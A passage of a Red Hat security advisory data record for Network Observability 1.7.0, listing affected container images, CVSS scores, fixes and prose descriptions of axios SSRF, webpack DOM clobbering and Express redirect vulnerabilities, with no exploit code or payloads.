"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", 